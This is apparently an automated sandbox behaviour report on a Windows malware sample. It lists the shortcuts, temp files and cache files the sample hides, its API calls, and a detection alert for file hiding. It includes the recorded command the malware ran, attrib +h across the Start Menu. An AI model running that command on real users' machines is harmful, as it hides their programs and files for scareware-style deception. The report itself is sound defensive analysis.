Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Netw
   ork Connections.lnk
16321757
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Netw
   ork Setup Wizard.lnk
16321640
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\New
   Connection Wizard.lnk
16321646
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Remo
   te Desktop Connection.lnk
16321503
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Wire
   less Network Setup Wizard.lnk
16321656
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Entertainment\Sound
    Recorder.lnk
16321528
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Entertainment\Volum
   e Control.lnk
16321528
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Activa
   te Windows.lnk
16321599
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Backup
   .lnk
16321532
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Charac
   ter Map.lnk
16321521
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Disk C
   leanup.lnk
16321532
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Disk D
   efragmenter.lnk
16321572
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Files
   and Settings Transfer Wizard.lnk
16321591
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Schedu
   led Tasks.lnk
16321753
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Securi
   ty Center.lnk
16321539
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\System
    Information.lnk
16321070
API Call
  API Name:  Sleep   Address:  0x0040b688
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\System
    Restore.lnk
16321616
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Accessibility
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Calculator.lnk
16321498
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Entertainment
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Paint.lnk
16321515
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Windows Movie Maker
   .lnk
1632790
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\WordPad.lnk
1632879
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Component
   Services.lnk
16321582
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Computer M
   anagement.lnk
16321602
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Data Sourc
   es (ODBC).lnk
16321596
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Event View
   er.lnk
16321592
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Local Secu
   rity Policy.lnk
16321590
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Performanc
   e.lnk
16321591
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Services.l
   nk
16321602
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoItX\AutoIt
   X Help File.lnk
1632790
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoItX\VBScri
   pt Examples.lnk
1632857
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoIt v3 Webs
   ite.lnk
1632748
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoItX
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\Browse Extras.
   lnk
1632667
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\AutoIt Help File.lnk
1632673
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\AutoIt Window Info.ln
   k
1632678
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Check For Updates.lnk
1632818
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Compile Script to .ex
   e.lnk
1632778
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Examples.lnk
1632661
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Run Script.lnk
1632678
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\SciTE Script Editor.l
   nk
1632750
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Debugging Help.lnk
1632871
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Global Flags.lnk
1632859
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Release Notes.lnk
1632871
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Uninstall Debugging Tools for Windows (x86).lnk
1632603
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\WinDbg.lnk
1632859
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Freecell.lnk
16321522
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Hearts.lnk
16321520
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Backgammon.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Checkers.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Hearts.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Reversi.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Spades.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Minesweeper.lnk
16321515
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Pinball.lnk
1632885
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Solitaire.lnk
16321491
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Spider Solitaire.lnk
16321502
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Digital Certificate for VBA Projects.lnk
16322022
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Clip Organizer.lnk
16321988
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office 2003 Language Settings.lnk
16321902
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office 2003 Save My Settings Wizard.lnk
16321908
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Application Recovery.lnk
16321876
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Document Imaging.lnk
16322140
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Document Scanning.lnk
16322142
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Picture Manager.lnk
16321964
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Excel 2003.lnk
16322044
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Outlook 2003.lnk
16322060
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce PowerPoint 2003.lnk
16322016
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Word 2003.lnk
16322036
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Mozilla Firefox\Mozilla Firefox
    (Safe Mode).lnk
16321636
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Mozilla Firefox\Mozilla Firefox
   .lnk
16321614
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\About QuickTime.lnk
1632692
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\PictureViewer.lnk
16321624
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\QuickTime Player.lnk
16321638
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\Uninstall QuickTime.l
   nk
16322044
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\Check for RealP
   layer Update.lnk
1632695
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Help
   .url
163275
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Lice
   nse Agreement.lnk
1632679
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Read
   Me.url
163286
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Subs
   cription.lnk
1632851
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer.lnk
1632733
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\Uninstall RealP
   layer.lnk
1632940
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Startup\Adobe Reader Speed Launch.lnk
16321746
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Startup\Adobe Reader Synchronizer.lnk
16321788
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Adobe Reader 8.lnk
16321804
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x86)
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Mozilla Firefox
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\MSN Explorer.lnk
16321844
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\RealPlayer.lnk
1632721
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Startup
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Windows Messenger.lnk
1632785
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Set Program Access and Defaults.lnk
16321563
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Windows Catalog.lnk
1632398
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Windows Update.lnk
16321507
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Launch Internet Explorer Browser.lnk
1632815
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Launch Microsoft Office Outlook.lnk
1632792
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Mozilla Firefox.lnk
16321620
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\QuickTime Player.lnk
16321644
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Show Desktop.scf
163279
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Windows Media Player.lnk
1632804
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0404.ini
16323787
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0406.ini
16325745
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0407.ini
16326285
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0409.ini
16325515
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x040a.ini
16326287
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x040b.ini
16325606
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x040c.ini
16326419
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0410.ini
16326180
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0411.ini
16325909
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0412.ini
16325065
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0413.ini
16326109
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0414.ini
16325714
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x041d.ini
16325505
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0804.ini
16323858
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\1033.MST
1632578048
Process
Started
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  attrib +h "C:\Documents and Settings\All Users\Start Menu\*.*" /s /d
3521436
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\ISScript11.Msi
1632982016
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\QuickTime.msi
163225888256
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\Setup.INI
16321964
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\_ISMSIDEL.INI
16321099
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\14fb2.mst
1632578048
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\ASPNETSetup_00000.log
16324562
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_depcheckdotnetfx30.txt
1632189516
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_dotnetfx3install.txt
163290098
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_msxml_retMSI02B5.txt
1632377108
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_netfx_retMSI02E0.txt
16324660860
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_rgb_retMSI02B2.txt
1632134638
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_vcredistMSI0B38.txt
1632513998
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_vcredistUI0B38.txt
163211434
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_wcf_retCA2FBE.txt
16325086
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_wcf_retMSI03B4.txt
1632773074
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_WF_3.0_x86retMSI0549.txt
1632240136
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_WIC.txt
16325206
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_wpf_retMSI03C4.txt
1632742906
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_XPS.txt
16323986
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\eG8kqEFi.pdf.part
163217286
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\hsperfdata_admin
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\java_install.log
163229093
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\java_install_reg.log
16322528
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\jusched.log
1632377
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\Microsoft Office 2003 Setup(0001).txt
163210088
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\Microsoft Office 2003 Setup(0001)_Task(0001).txt
1632185086
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\offcln11.log
163237450
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\OHotfix
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\outlook logging
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\QTInstallCode.log
1632449
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\qtplugin.log
16323810
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\QuickTimeInstaller.exe
163233286211
Malicious  Alert
Misc  Anomaly
Message:   System file hiding observed    Detail:   Malware hiding existing exe/dll/sys file   
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\RunTime.ini
1632543
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\Silverlight0.log
16321744
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\SilverlightMSI.log
1632416786
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\uxeventlog.txt
16322682
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\UZ5uPYHL8nfdS6.exe.tmp
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
1632328192
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\AntiPhishing\B3BB5BBA-E7D5-40AB-A041-A5B1C0B26C8F.dat
163278924
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\25D138991D2CF5FA1A5994BD1F57E[1].jpg
16326920
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\28[1].gif
16321020
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\61F056D14E3B1DF5E5CDEEF9ACD32[1].jpg
16329101
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\80533250A254877B56CEC7A3E11814[1].jpg
16327812
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\adchoices_gif2[1].gif
1632417
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\ADSAdClient31[1].htm
16322269
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\BING_websearch_2[1].jpg
16324082
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\CADMFJLI
163246585
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\cc36ca69630adc1a2052edc7351a47[1].gif
1632172
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\CFD4C7A3DEC612B8970E4CECB2730[1].jpg
163210494
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\en[1].js
163211920
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\F546EEED371C545A636442BA2F5A[1].jpg
16328996
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\jquery-1.4.2.min[1].js
163272182
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\sck[1].htm
16322489
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\shared[1].js
163272294
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\Uabrand[1].gif
16321525
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\111228_UTV_Lockin_25_HD_300x250[1].jpg
163226142
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\16ACFBE979249C5A2B33CF31BD97F[1].jpg
16328056
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\63dedd9603afc397923c5f9acda0e8[1].gif
16329256
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\73C3D7761EFD8E8F45593AA435A5C[1].jpg
163223065
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\7A5D9D8617C37E906519E9AC7597[1].jpg
16327015
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\7F1F48FB1DF076546AEAE4A289818[1].jpg
16327993
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\9654C52CBBD87D20FBBB2C81E4E44[1].jpg
16323931
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\A644C68FE0C782F9685C86683E3B6[1].jpg
16326886
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\ADSAdClient31[1].htm
16322443
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\alttext[1].xml
16321994
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\B72D63B99781477B320F154B41C[1].jpg
16325005
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\C4A3B49CC6B6506FD6D7193A4411[1].jpg
16323382
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\CA184JL9.HTM
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\clock[1]
16321177
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\dapmsn[1].js
16323842
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\qsonhs[1].aspx
163235
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\37BA92E210D341BFDBF4126422A3D2[1].gif
1632657
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\3BAAF1D5F446B668C7FC8CFAE0979F[1].jpg
16324208
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\4BD88A51585C67154F1B1E1AA0D6[1].jpg
16328168
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\4FD0E52BA6B72CC7965AD89E843835[1].jpg
16323424
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\5280118e68aedbc5821d17132a5340[1].gif
163293
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\614595fba50d96389708a4135776e4[1].gif
163243
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\617475cf39bf6f5c0bd6ecb985335c[1].gif
163248
File
Hide
